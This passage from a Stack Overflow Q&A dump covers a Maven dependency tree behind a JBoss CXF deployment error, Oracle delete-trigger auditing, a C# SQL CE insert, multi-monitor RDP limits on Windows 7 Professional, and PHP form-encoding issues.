version managed from 2.5; omitted for duplicate)\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.1; omitted for duplicate)\n[INFO] | | | +- (commons-digester:commons-digester:jar:1.8.1:compile - version managed from 1.8; omitted for duplicate)\n[INFO] | | | \\- (commons-beanutils:commons-beanutils-core:jar:1.7.0:compile - omitted for duplicate)\n[INFO] | | +- commons-beanutils:commons-beanutils-core:jar:1.7.0:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | \\- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 2.0; omitted for duplicate)\n[INFO] | | +- (commons-fileupload:commons-fileupload:jar:1.2.2:compile - version managed from 1.2; omitted for duplicate)\n[INFO] | | +- (commons-collections:commons-collections:jar:3.2.1:compile - version managed from 3.2; omitted for duplicate)\n[INFO] | | +- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | | +- org.beanshell:bsh-core:jar:2.0b4:compile\n[INFO] | | \\- org.owasp.antisamy:antisamy:jar:1.4.3:compile\n[INFO] | | +- org.apache.xmlgraphics:batik-css:jar:1.7:compile\n[INFO] | | | +- org.apache.xmlgraphics:batik-ext:jar:1.7:compile\n[INFO] | | | \\- org.apache.xmlgraphics:batik-util:jar:1.7:compile\n[INFO] | | +- net.sourceforge.nekohtml:nekohtml:jar:1.9.12:compile\n[INFO] | | \\- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | \\- org.owasp:csrfguard:jar:3.0.0:compile\n[INFO] +- [proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- [proprietary-jar-8]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | | +- ([proprietary-jar-4]:compile - omitted for duplicate)\n[INFO] | | +- ([proprietary-jar-3]:2.4.0:compile - omitted for duplicate)\n[INFO] | | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | | \\- ([proprietary-jar-6]:jar:1.0.2:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-9]:jar:2.4.0:compile\n[INFO] | +- [proprietary-jar-10]:jar:2.4.0:compile\n[INFO] | +- [proprietary-jar-11]:jar:188.8.131.52:compile\n[INFO] | +- ([proprietary-jar-6]:jar:1.0.2:compile - omitted for duplicate)\n[INFO] | \\- org.springframework:spring-web:jar:3.0.7.RELEASE:compile\n[INFO] | +- aopalliance:aopalliance:jar:1.0:compile\n[INFO] | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] +- [proprietary-jar-12]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- de.vdb:IBANConverter:jar:1.1.3:compile\n[INFO] | +- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-16]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | | +- org.aspectj:aspectjrt:jar:1.6.8:compile\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- commons-cli:commons-cli:jar:1.2:compile\n[INFO] | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-rt:jar:1.0.3:compile\n[INFO] | | | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-check-ct:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-check-rt:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | +- org.patterntesting:patterntesting-concurrent:jar:1.0.3:compile\n[INFO] | | | +- (org.patterntesting:patterntesting-rt:jar:1.0.3:compile - omitted for duplicate)\n[INFO] | | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.9.RELEASE; omitted for duplicate)\n[INFO] | | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | \\- net.sf.oval:oval:jar:1.40:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-8]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- org.apache.commons:commons-collections4:jar:4.0:compile\n[INFO] | +- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | +- commons-logging:commons-logging:jar:1.1.1:compile\n[INFO] | +- com.itextpdf:itextpdf:jar:5.1.2:compile\n[INFO] | +- (net.sf.json-lib:json-lib:jar:jdk15:2.4:compile - omitted for duplicate)\n[INFO] | +- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | +- (com.thoughtworks.xstream:xstream:jar:1.2.2:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-4]:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-5]:1.4.0:compile\n[INFO] | | +- (javax.xml.bind:jaxb-api:jar:2.1:compile - omitted for duplicate)\n[INFO] | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.2; omitted for duplicate)\n[INFO] | | +- org.aspectj:aspectjweaver:jar:1.6.8:compile\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-orm:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- (org.slf4j:slf4j-api:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | +- (org.slf4j:slf4j-log4j12:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | \\- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | +- ([proprietary-jar-3]:2.4.0:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-11]:jar:184.108.40.206:compile - omitted for duplicate)\n[INFO] | +- org.springframework:spring-beans:jar:3.0.7.RELEASE:compile\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- org.springframework:spring-context:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- org.springframework:spring-expression:jar:3.0.7.RELEASE:compile\n[INFO] | | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- org.springframework:spring-asm:jar:3.0.7.RELEASE:compile\n[INFO] | +- org.springframework:spring-core:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-asm:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.springframework:spring-orm:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-jdbc:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | +- org.springframework:spring-tx:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (aopalliance:aopalliance:jar:1.0:compile - omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- (org.springframework:spring-test:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | \\- [proprietary-jar-1]:jar:1.3:compile\n[INFO] | +- (commons-codec:commons-codec:jar:1.8:compile - version managed from 1.3; omitted for duplicate)\n[INFO] | \\- (org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] +- [proprietary-jar-13]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | \\- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] +- [proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- commons-digester:commons-digester:jar:1.8.1:compile (version managed from 1.8)\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-ws-security:jar:2.7.10:compile\n[INFO] | | +- org.apache.cxf:cxf-api:jar:2.7.10:compile\n[INFO] | | | +- org.codehaus.woodstox:woodstox-core-asl:jar:4.2.0:compile\n[INFO] | | | | \\- org.codehaus.woodstox:stax2-api:jar:3.1.1:compile\n[INFO] | | | +- (org.apache.ws.xmlschema:xmlschema-core:jar:2.1.0:compile - omitted for duplicate)\n[INFO] | | | +- org.apache.geronimo.specs:geronimo-javamail_1.4_spec:jar:1.7.1:compile\n[INFO] | | | \\- wsdl4j:wsdl4j:jar:1.6.3:compile\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | \\- org.apache.cxf:cxf-rt-databinding-jaxb:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | \\- (com.sun.xml.bind:jaxb-impl:jar:2.1.13:compile - omitted for duplicate)\n[INFO] | | +- net.sf.ehcache:ehcache-core:jar:2.5.1:compile\n[INFO] | | | \\- (org.slf4j:slf4j-api:jar:1.6.1:compile - omitted for conflict with 1.5.6)\n[INFO] | | +- org.apache.ws.security:wss4j:jar:1.6.14:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | +- org.apache.santuario:xmlsec:jar:1.5.6:compile\n[INFO] | | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | \\- org.opensaml:opensaml:jar:2.5.1-1:compile\n[INFO] | | | \\- org.opensaml:openws:jar:1.4.2-1:compile\n[INFO] | | | \\- org.opensaml:xmltooling:jar:1.3.2-1:compile\n[INFO] | | | +- (org.slf4j:slf4j-api:jar:1.6.1:compile - omitted for conflict with 1.5.6)\n[INFO] | | | +- joda-time:joda-time:jar:1.6.2:compile\n[INFO] | | | \\- (org.apache.santuario:xmlsec:jar:1.4.4:compile - omitted for conflict with 1.5.6)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-transports-http:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-frontend-jaxws:jar:2.7.10:compile\n[INFO] | | +- xml-resolver:xml-resolver:jar:1.2:compile\n[INFO] | | +- asm:asm:jar:3.3.1:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-bindings-xml:jar:2.7.10:compile\n[INFO] | | | \\- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-frontend-simple:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | \\- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.cxf:cxf-rt-ws-addr:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.cxf:cxf-rt-ws-policy:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.neethi:neethi:jar:3.0.3:compile\n[INFO] | +- org.apache.cxf:cxf-rt-core:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- com.sun.xml.bind:jaxb-impl:jar:2.1.13:compile\n[INFO] | | \\- org.apache.ws.xmlschema:xmlschema-core:jar:2.1.0:compile\n[INFO] | +- oro:oro:jar:2.0.7:compile\n[INFO] | +- commons-fileupload:commons-fileupload:jar:1.2.2:compile\n[INFO] | +- org.springframework.security:spring-security-config:jar:3.0.7.RELEASE:runtime\n[INFO] | | \\- (org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | +- org.springframework:spring-context-support:jar:3.0.7.RELEASE:runtime\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | \\- org.springframework.security.extensions:spring-security-kerberos-core:jar:1.0.0.M2:runtime\n[INFO] +- [proprietary-jar-14]:jar:model1:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- (commons-digester:commons-digester:jar:1.8.1:compile - version managed from 1.8; omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-ws-security:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-transports-http:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-frontend-jaxws:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (oro:oro:jar:2.0.7:compile - omitted for duplicate)\n[INFO] | +- (commons-fileupload:commons-fileupload:jar:1.2.2:compile - version managed from 1.2; omitted for duplicate)\n[INFO] | +- (org.springframework.security:spring-security-config:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | +- (org.springframework:spring-context-support:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | \\- (org.springframework.security.extensions:spring-security-kerberos-core:jar:1.0.0.M2:runtime - omitted for duplicate)\n[INFO] +- [proprietary-jar-15]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-12]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | \\- ([proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] +- com.ibm.db2.jcc:db2jcc_license_cu:jar:9.7:test\n[INFO] \\- com.ibm.db2.jcc:db2jcc4:jar:9.7fp5:test\n<\/code>\nAny help?\n<code>Caused by: java.io.IOException: Child not found [war project]\/WEB-INF\/lib\/spring-security-core-3.0.7.RELEASE.jar for DelegatingHandler@263476109[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\ncontext=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar], available childr\nen: [ZipEntryHandler@131683849[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/META-INF context=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.\nGA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/META-INF], ZipEntryHandler@1302293733[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/com context=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/com]]\n<\/code>\nComment: That's the error....you should look for the cause, the part of the log that tells you what caused the error.\nComment: Omoro, I added the full stack. The cause says that the spring jar was not found. But if I open the war file, it is there...\nThanks for the help\nComment: Did you build using maven, if yes, please show us the dependency details.\nComment: Hi Bennet, Yes, I used Maven. I posted the dependency tree. Thanks!\nComment: Please paste the dependency details. not tree.\nComment: \norg.apache.geronimo.specs\ngeronimo-annotation_1.0_spec\n1.1.1\njar\ncompile\n try this dependency in your pom.xml and build the application and try deploying it\nAnswer: Please forgive me. This was a totally misleading error I was getting and the problem was caused by a different application. After removing all applications from the server but the one I was testing, it started to work.\nSorry for this.\n","meta":{"source":"stackoverflow","title":"Error deploying CXF web service on JBoss","dup_signals":{}},"subset":"stackexchange"} +{"text":"Auditing logged in user with delete trigger\n\nQuestion: We have an audit option in our application, where we are auditing the deleted records from a table using AFTER DELETE ON trigger. \nProblem description :\nThe problem that we face here is, we need to log the person who has deleted the record. We could not get id of the person deleted the record anywhere from the database as its not present. Its coming from the web application. My question is there anyway to get the name or id of the person who has logged into the web application in the database side.\nWe are using oracle 11g.\nAnswer: You should be able to do this using dbms_session package.Using the package you can set and get values.Hence , during the login to your application , you can set the value and finally while on delete trigger execution , get this and insert into the audit table.\nThis might come handy - http:\/\/www.dba-oracle.com\/t_dbms_session.htm\nHope that helps !\nComment: Thanks for the suggestion. have a question regd that. Can this approach handle concurrent access of the application by more than one users?\nComment: Definitely it can.You can try it by logging these values into a table at transaction level and verify the same.\n","meta":{"source":"stackoverflow","title":"Auditing logged in user with delete trigger","dup_signals":{}},"subset":"stackexchange"} +{"text":"call component from form to class and save data back to table\n\nQuestion: i am working on ado.net project,, i used to have separate classes for codes ,,, \nnow i am trying to learn more about local databases but i am stock when i tried to call class that contain SQL commands ,,, please \nhave a look to my code i commented where i stock\n<code> namespace Maintenance\n {\n public partial class registerReports : Form\n {\n private void btnSave_Click(object sender, EventArgs e)\n {\n \/\/the code works if it exists here\n \/**\n conn.Open();\n com.Parameters.AddWithValue(\"@reportID\",\n tbReportIDox.Text);\n com.ExecuteNonQuery();\n conn.Close();\n **\/\n }\n }\n }\n<\/code>\n\n<code> class reportTableSQL \n {\n public void reportTable()\n {\n string connectionString = connectionString = \"Data Source=\n ..\/\/..\/\/maintenanceDB.sdf\";\n SqlCeConnection conn = new SqlCeConnection(connectionString);\n\n using (SqlCeCommand com = new SqlCeCommand(\"INSERT INTO\n ReportForm VALUES(@reportID)\", conn))\n {\n \/\/ if i call this method from class registerReports : Form\n \/\/ it doesn't recognise tbReportIDox.Text as\n \/\/it isn't exist in this class\n\n \/**\n conn.Open();\n com.Parameters.AddWithValue(\"@reportID\",\n tbReportIDox.Text);\n com.ExecuteNonQuery();\n conn.Close();\n **\/\n }\n }\n }\n<\/code>\nthank you \nAnswer: What you can do is to pull <code>tbReportIDox.Text<\/code> up as a parameters to the method, that is\n<code>public void reportTable(string reportName)\n{ \n ...\n com.Parameters.AddWithValue(\"@reportID\", reportName);\n ...\n}\n<\/code>\nAnd then on a button click\n<code>private void btnSave_Click(object sender, EventArgs e)\n{\n \/\/ resolve instance of reportTableSQL class\n \/\/ for example through: new reportTableSQL();\n var reportGenerator = new reportTableSQL();\n reportGenerator.reportTable(tbReportIDox.Text);\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"call component from form to class and save data back to table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Alternatives to RDP under Windows 7 Professional using 2 monitors\n\nQuestion: My PC at work has Windows 7 Professional Edition which I know I cannot use the regular RDP to connect using 2 monitors.\nIs there any alternative I can use to connect to a Windows 7 Professional Edition via RDP?\nComment: What's this about two monitors? What doesn't work?\nComment: Windows 7 Professional Edition doesn't support RDP with multiple monitors. I was wondering If I can make it work using an alternative. [See this link for more info](http:\/\/windows.microsoft.com\/en-US\/Windows7\/Remote-Desktop-Connection-frequently-asked-questions)\nComment: Off topic. Belongs on SuperUser.\nAnswer: Just to clear this up\nWindows 7 pro can use true multiple monitors when it is the client (connecting to server 2008\/windows 7 ult or enterprise)\nWhen it is the HOST (ie the one you are connecting to) it will only allow single monitor connections to it, the span option works to stretch the session over 2 screens but it ISNT true multimonitor mode\nSorry sam but you cant connect to windows 7 pro in tru multimon mode, the screenshot you have shown is the remote desktop client, hence why the options are there\nComment: Actually, it can work if you install RDPWrap - https:\/\/github.com\/stascorp\/rdpwrap - it doesn't say, but it enables multimon rdp support in win 7 pro as well. Yay! :)\nAnswer: The situation is that when Win7 Pro is the host (meaning it is the remote machine), it does NOT provide multiple monitor support.\nNo matter what settings you use on the client, you will get only a single monitor, if the host is Win7 Pro. Period.\nThe sad fact is that the Win7 FAQ - for a long time - said ALL versions of Win7 supported multiple monitors through RDP, without qualification.\nAfter many users complained of this failing with Win7 Pro as the host, Microsoft fixed it - by changing the FAQ. Frankly, Microsoft owes this feature to all Win7 users, but Win8 is now the new (and obviously, at the time of this writing, failed) focus of attention.\nThere ARE programs out there that patch Windows Home to have full RDP hosting (actually, the 2008 server version, which allows multiple remote desktops). Apparently it is a single DLL and, possibly, some registry changes. I have no idea if they'd work for Pro, but my guess is that they would.\nThat said, if you have an IT department managing your host PC, you probably can't do this, and will have spend $130 to use the Anytime upgrade to the Ultimate version.\nThis despite the fact that the overwhelming desktop being remotely connected to at businesses is Pro. Yeah, I think MS just found a possible cash cow, and of course won't ever admit it, or live up the promise they made via their FAQ for quite a long time.\nAnswer: Win7 does have duel monitor support\nWinXP does not\nAs long as the PC you are using, and the PC you are connected to is Win7, there should not be a problem. Also the PC you are Using the RDP connection from must have duel screens. If not you well have to use a VNC like Teamviewer.\nSee below\nComment: Professional does support that ability. We are using Win 7 Professional and We have that ablity. Are you sure your not using Home Edition.\nComment: As I mentioned, I'm using Windows 7 Professional Edition. Only Enterprise or Ultimate have support for dual monitors.\nComment: Yes I'm sure. Are you able to connect to Natalie-PC (the PC with Windows Professional) from another computer using 2 monitors using RDP?\nComment: this is really weird. it can't. it's posted every where it can't. And i am unable to that that on my win7 professional. \naside all that. i wouldn't wanna be the guy using rpd to a machine with only 2gb of mem.\n","meta":{"source":"stackoverflow","title":"Alternatives to RDP under Windows 7 Professional using 2 monitors","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Form Variables and POST - HTML Encoded Strings\n\nQuestion: I am not strong on my PHP knowledge, but I have never seen this before. In a config file, there are a list of options defined in an array like so:\n<code>$testarray[] = \"None\";\n$testarray[] = \"Item 1 with normal text\";\n$testarray[] = \"Item 2® with html encoded string\";\n$testarray[] = \"Item3® with another html encoded string\";\n<\/code>\nSo now, when the form is generated, it does a simple for each loop to create a list of radio buttons:\n<code>foreach ( $testarray as $key=>$item){\necho '<div id=\"padBottom\"><input type=\"radio\" name=\"formItem\"';\n if ( $item == $_SESSION['ss']['selection']) echo ' checked=\"checked\"';\n echo ' value=\"' . $item. '\" \/>' . $item. '<\/div>';\n}\n<\/code>\nSo far so good, the form generates like it should. The part that is not working is the If statement portion. On the page that this form posts to, it does a simple call to set <code>$_SESSION['ss']['selection'] = $_POST['formItem'];<\/code> When this happens, the value that goes into session is the actual registered trademark symbol and not <code>'®'<\/code> as I would expect. As a result, if you select an item with the HTML encoded entity in it, we are not getting a match and your selection appears to be lost. In this example, choosing the first or second option results in the proper radio button being selected - if you choose option 3 or 4, then no selection appears to have been made when you return to this screen. \nAddtional info - the charset for this page is UTF-8 if that makes any difference here.\nThings I have tried\n\nhtmlspecialchars on the POST variable in the next page: result, nothing, still showing actual symbol.\nhtmlspecialchars on the form value for each radio option: result, I get <code>&reg;<\/code> as part of my value which doesn't display well.\nAnswer: Some characters (including ampersands) have special meaning in HTML, you have to represent them as entities if you don't want that special meaning to take effect.\nIn this case, it is the variable you are inserting into the value attribute that you need to encode.\nComment: thanks for the input. I knew it had something to do with html encoding, I just hadn't tried the right combination yet. I tried #1 above and then #2 above with #1 still in place and that didn't work. But just simply html encoding the value and not again on the post worked great. Thanks!\nAnswer: It might work better if you used the index of the item, rather than its contents, as the index is just a number in this case:\n<code>foreach ( $testarray as $key=>$item) {\n echo '<div id=\"padBottom\"><input type=\"radio\" name=\"formItem\"';\n if ( $key == $_SESSION['ss']['selection']) echo ' checked=\"checked\"';\n echo ' value=\"' . $key .'\" \/>' . $item. '<\/div>';\n}\n<\/code>\nComment: Yeah i agree, I would much rather use integer keys than string matching, but alas, that is not what was given to me from the last programmer and I am not about to refactor this steaming pile o' code :)\n","meta":{"source":"stackoverflow","title":"PHP Form Variables and POST - HTML Encoded Strings","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to integrate a symbolic sum?\n\nQuestion: I'm trying to integrate a function that 